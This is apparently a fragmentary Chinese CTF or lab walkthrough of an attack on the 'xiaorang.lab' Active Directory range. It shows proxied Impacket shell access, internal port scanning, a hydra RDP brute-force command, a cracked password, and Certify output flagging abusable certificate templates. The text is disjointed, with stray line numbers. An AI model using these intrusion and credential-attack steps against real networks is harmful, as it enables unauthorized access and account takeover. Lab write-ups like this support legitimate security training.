1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 ──(root㉿kali)-[~] └─ [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.16 [proxychains] DLL init: proxychains-ng 4.16 [proxychains] DLL init: proxychains-ng 4.16 Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [proxychains] Dynamic chain ... 43.138.127.132:50000 ... 172.22.2.3:445 ... OK [*] SMBv3.0 dialect used [proxychains] Dynamic chain ... 43.138.127.132:50000 ... 172.22.2.3:135 ... OK [proxychains] Dynamic chain ... 43.138.127.132:50000 ... 172.22.2.3:49666 ... OK [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami xiaorang\administrator C:\>
Certify 1 find / -perm -u=s -type f 2>/dev/null
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 (icmp) Target 172.22.9.19 is alive (icmp) Target 172.22.9.7 is alive (icmp) Target 172.22.9.13 is alive (icmp) Target 172.22.9.26 is alive (icmp) Target 172.22.9.47 is alive [*] Icmp alive hosts len is: 5 172.22.9.26:80 open 172.22.9.47:80 open 172.22.9.47:22 open 172.22.9.19:80 open 172.22.9.19:22 open 172.22.9.47:21 open 172.22.9.47:445 open 172.22.9.26:445 open 172.22.9.13:445 open 172.22.9.7:445 open 172.22.9.13:139 open 172.22.9.26:139 open 172.22.9.47:139 open 172.22.9.7:139 open 172.22.9.26:135 open 172.22.9.13:135 open 172.22.9.7:135 open 172.22.9.7:88 open 172.22.9.19:8983 open 172.22.9.7:3389 open 172.22.9.26:3389 open 172.22.9.13:3389 open [*] alive ports len is: 22 start vulscan [*] NetInfo: [*]172.22.9.7 [->]XIAORANG-DC [->]172.22.9.7 [*] NetInfo: [*]172.22.9.26 [->]DESKTOP-CBKTVMO [->]172.22.9.26 [*] WebTitle: http://172.22.9.19 code:200 len:612 title:Welcome to nginx! [*] NetInfo: [*]172.22.9.13 [->]CA01 [->]172.22.9.13 [*] NetBios: 172.22.9.47 fileserver Windows 6.1 [*] NetBios: 172.22.9.26 XIAORANG\DESKTOP-CBKTVMO [*] WebTitle: http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works [*] WebTitle: http://172.22.9.26 code:200 len:703 title:IIS Windows Server [*] NetBios: 172.22.9.13 XIAORANG\CA01 [*] NetBios: 172.22.9.7 [+]DC XIAORANG\XIAORANG-DC [*] 172.22.9.47 (Windows 6.1) [*] WebTitle: http://172.22.9.19:8983 code:302 len:0 title:None 跳转url: http://172.22.9.19:8983/solr/ [*] WebTitle: http://172.22.9.19:8983/solr/ code:200 len:16555 title:Solr Admin
1 proxychains smbclient \\\\172.22.9.47\\fileshare
smb连接到文件服务下获取到提示
1 proxychains4 hydra -L user.txt -P passwd.txt 172.22.9.26 rdp
liupeng/fiAzGwEMgTY
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 _____ _ _ __ / ____| | | (_)/ _| | | ___ _ __| |_ _| |_ _ _ | | / _ \ '__| __| | _| | | | | |___| __/ | | |_| | | | |_| | \_____\___|_| \__|_|_| \__, | __/ | |___./ v1.1.0 [*] Action: Find certificate templates [*] Using the search base ' CN=Configuration,DC=xiaorang,DC=lab' [*] Listing info about the Enterprise CA ' xiaorang-CA01-CA' Enterprise CA Name : xiaorang-CA01-CA DNS Hostname : CA01.xiaorang.lab FullName : CA01.xiaorang.lab\xiaorang-CA01-CA Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED Cert SubjectName : CN=xiaorang-CA01-CA, DC=xiaorang, DC=lab Cert Thumbprint : E50DC31FF6B0BA683078A2019BC11EA68D8EDE9F Cert Serial : 63C71D005A6E478D440D21CFC707855A Cert Start Date : 2022/7/13 12:23:11 Cert End Date : 2027/7/13 12:33:10 Cert Chain : CN=xiaorang-CA01-CA,DC=xiaorang,DC=lab UserSpecifiedSAN : Disabled CA Permissions : Owner: BUILTIN\Administrators S-1-5-32-544 Access Rights Principal Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11 Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544 Allow ManageCA, ManageCertificates XIAORANG\Domain Admins S-1-5-21-2318488573-3353402606-1029629362-512 Allow ManageCA, ManageCertificates XIAORANG\Enterprise Admins S-1-5-21-2318488573-3353402606-1029629362-519 Enrollment Agent Restrictions : None [!] Vulnerable Certificates Templates : CA Name : CA01.xiaorang.lab\xiaorang-CA01-CA Template Name : XR Manager Schema Version : 2 Validity Period : 1 year Renewal Period : 6 weeks msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS Authorized Signatures Required : 0 pkiextendedkeyusage : 安全电子邮件, 加密文件系统, 客户端身份验证 mspki-certificate-application-policy : 安全电子邮件, 加密文件系统, 客户端身份验证 Permissions Enrollment Permissions Enrollment Rights : XIAORANG\Administrator S-1-5-21-2318488573-3353402606-1029629362-500 XIAORANG\chenchen S-1-5-21-2318488573-3353402606-1029629362-1128 XIAORANG\Domain Admins S-1-5-21-2318488573-3353402606-1029629362-512 XIAORANG\Domain Computers S-1-5-21-2318488573-3353402606-1029629362-515 XIAORANG\Enterprise Admins S-1-5-21-2318488573-3353402606-1029629362-519 XIAORANG\wangbin S-1-5-21-2318488573-3353402606-1029629362-1171 XIAORANG\zhangrui S-1-5-21-2318488573-3353402606-1029629362-1157 XIAORANG\zhangxia S-1-5-21-2318488573-3353402606-1029629362-1186 Object Control Permissions Owner : XIAORANG\Administrator S-1-5-21-2318488573-3353402606-1029629362-500 WriteOwner Principals : XIAORANG\Administrator S-1-5-21-2318488573-3353402606-1029629362-500 XIAORANG\Domain Admins S-1-5-21-2318488573-3353402606-1029629362-512 XIAORANG\Enterprise Admins S-1-5-21-2318488573-3353402606-1029629362-519 XIAORANG\zhangxia S-1-5-21-2318488573-3353402606-1029629362-1186 WriteDacl Principals : XIAORANG\Administrator S-1-5-21-2318488573-3353402606-1029629362-500 XIAORANG\Domain Admins S-1-5-21-2318488573-3353402606-1029629362-512 XIAORANG\Enterprise Admins S-1-5-21-2318488573-3353402606-1029629362-519 XIAORANG\zhangxia S-1-5-21-2318488573-3353402606-1029629362-1186 WriteProperty Principals : XIAORANG\Administrator S-1-5-21-2318488573-3353402606-1029629362-500 XIAORANG\Domain Admins S-1-5-21-2318488573-3353402606-1029629362-512 XIAORANG\Enterprise Admins S-1-5-21-2318488573-3353402606-1029629362-519 XIAORANG\zhangxia S-1-5-21-2318488573-3353402606-1029629362-1186 CA Name : CA01.xiaorang.lab\xiaorang-CA01-CA Template Name : XR Machine Schema Version : 2 Validity Period : 1 year Renewal Period : 6 weeks msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT mspki-enrollment-flag : NONE Authorized Signatures Required : 0 pkiextendedkeyusage : 服务器身份验证, 客户端身份验证 mspki-certificate-application-policy : 服务器身份验证, 客户端身份验证 Permissions Enrollment Permissions Enrollment Rights : XIAORANG\chenchen S-1-5-21-2318488573-3353402606-1029629362-1128 XIAORANG\Domain Admins S-1-5-21-2318488573-3353402606-1029629362-512 XIAORANG\Domain Computers S-1-5-21-2318488573-3353402606-1029629362-515 XIAORANG\Enterprise Admins S-1-5-21-2318488573-3353402606-1029629362-519 XIAORANG\zhangxia S-1-5-21-2318488573-3353402606-1029629362-1186 Object Control Permissions Owner : XIAORANG\Administrator S-1-5-21-2318488573-3353402606-1029629362-500 WriteOwner Principals : XIAORANG\Administrator S-1-5-21-2318488573-3353402606-1029629362-500 XIAORANG\Domain Admins S-1-5-21-2318488573-3353402606-1029629362-512 XIAORANG\Enterprise Admins S-1-5-21-2318488573-3353402606-1029629362-519 WriteDacl Principals : XIAORANG\Administrator S-1-5-21-2318488573-3353402606-1029629362-500 XIAORANG\Domain Admins S-1-5-21-2318488573-3353402606-1029629362-512 XIAORANG\Enterprise Admins S-1-5-21-2318488573-3353402606-1029629362-519 WriteProperty Principals : XIAORANG\Administrator S-1-5-21-2318488573-3353402606-1029629362-500 XIAORANG\Domain Admins S-1-5-21-2318488573-3353402606-1029629362-512 XIAORANG\Enterprise Admins S-1-5-21-2318488573-3353402606-1029629362-519 Certify completed in 00:00:09.9619968
hashcat爆破